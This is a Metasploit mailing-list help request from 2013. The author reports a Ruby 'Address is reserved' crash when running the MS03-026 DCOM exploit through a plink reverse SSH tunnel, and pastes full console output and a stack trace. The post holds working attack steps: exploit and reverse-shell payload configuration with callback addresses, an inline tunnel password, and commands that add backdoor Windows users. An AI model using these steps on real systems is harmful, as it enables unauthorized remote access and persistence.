Metasploit mailing list archives
Interactive payloads fail through SSH tunnel
From: "Mike Jones!" <property.of.mike.jones () gmail com>
Date: Sat, 23 Feb 2013 21:36:04 -0500
Hello,

Meterpreter crashes when used through an SSH tunnel. I'm sure it is me doing something stupid so was hoping somebody could point out my mistake. I start with a meterpreter shell on an unprivileged account, then set up SSH tunnel for port 135 so I can do MS03-026 exploit against DCOM. Probably good to mention too that there is no NAT between the two systems.

meterpreter > shell
Process 1936 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\foobar>plink -l root -pw mystupidpassword -R 135:localhost:135 192.168.12.48

My system is 192.168.12.48. Tunnel is created and target has service up and running on its port 135. Now I set up exploit in separate metasploit instance.

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set LHOST 192.168.12.48
LHOST => 192.168.12.48
msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST  127.0.0.1        yes       The target address
RPORT  135              yes       The target port

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
LHOST     192.168.12.48    yes       The listen address
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Windows NT SP3-6a/2000/XP/2003 Universal

Now I run exploit and it is successful, payload lands, meterpreter shell opens. Then it crashes when I do anything.

msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on 192.168.12.48:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.13.203
meterpreter > getuid
[-] Session manipulation failed: Validation failed: Address is reserved
["/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/validations.rb:56:in `save!'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/attribute_methods/dirty.rb:33:in `save!'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:246:in `block in save!'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:295:in `block in with_transaction_returning_status'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract/database_statements.rb:192:in `transaction'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:208:in `transaction'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:293:in `with_transaction_returning_status'",
"/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:246:in `save!'",
"/opt/metasploit/msf3/lib/msf/core/db.rb:349:in `block in report_host'",
"/opt/metasploit/msf3/lib/msf/core/patches/active_record.rb:22:in `with_connection'",
"/opt/metasploit/msf3/lib/msf/core/db.rb:295:in `report_host'",
"/opt/metasploit/msf3/lib/msf/core/db.rb:1904:in `block in report_event'",
"/opt/metasploit/msf3/lib/msf/core/patches/active_record.rb:22:in `with_connection'",
"/opt/metasploit/msf3/lib/msf/core/db.rb:1898:in `report_event'",
"/opt/metasploit/msf3/lib/msf/core/framework.rb:222:in `report_event'",
"/opt/metasploit/msf3/lib/msf/core/framework.rb:331:in `session_event'",
"/opt/metasploit/msf3/lib/msf/core/framework.rb:408:in `block in on_session_output'",
"/opt/metasploit/msf3/lib/msf/core/framework.rb:407:in `each'",
"/opt/metasploit/msf3/lib/msf/core/framework.rb:407:in `on_session_output'",
"/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:183:in `block in method_missing'",
"/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:181:in `each'",
"/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:181:in `method_missing'",
"/opt/metasploit/msf3/lib/msf/core/session_manager.rb:238:in `block in register'",
"/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:271:in `call'",
"/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:271:in `print_error'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:436:in `unknown_command'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:411:in `run_single'",
"/opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'",
"/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:190:in `call'",
"/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:190:in `run'",
"/opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'",
"/opt/metasploit/msf3/lib/msf/base/sessions/meterpreter.rb:431:in `_interact'",
"/opt/metasploit/msf3/lib/rex/ui/interactive.rb:49:in `interact'",
"/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/core.rb:1596:in `cmd_sessions'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'",
"/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:179:in `cmd_exploit'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'",
"/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'",
"/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:200:in `run'",
"./msfconsole:148:in `<main>'"]

This isn't limited to meterpreter. I tried different payload for just shell and still crashed.

msf exploit(ms03_026_dcom) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on 192.168.12.48:9090
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ...
[*] Sending exploit ...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user test test /add
[-] Session manipulation failed: Validation failed: Address is reserved ... {snipped}

Though a non-interactive payload works ok.

msf exploit(ms03_026_dcom) > set payload windows/adduser
payload => windows/adduser
msf exploit(ms03_026_dcom) > set USER testuser
USER => testuser
msf exploit(ms03_026_dcom) > set PASS Testpass@1
PASS => Testpass@1
msf exploit(ms03_026_dcom) > exploit
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ...
[*] Sending exploit ...
msf exploit(ms03_026_dcom) >

In that case, new user 'testuser' was added. I saw a couple threads with this same error but didn't glean a simple solution from them. There are also lots of this error on pastebin.

https://community.rapid7.com/thread/2046
https://community.rapid7.com/thread/1856

Also saw an example where the person set ExitOnSession false, tried that, still crashes. Guys help I am stupid what am I doing wrong?
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework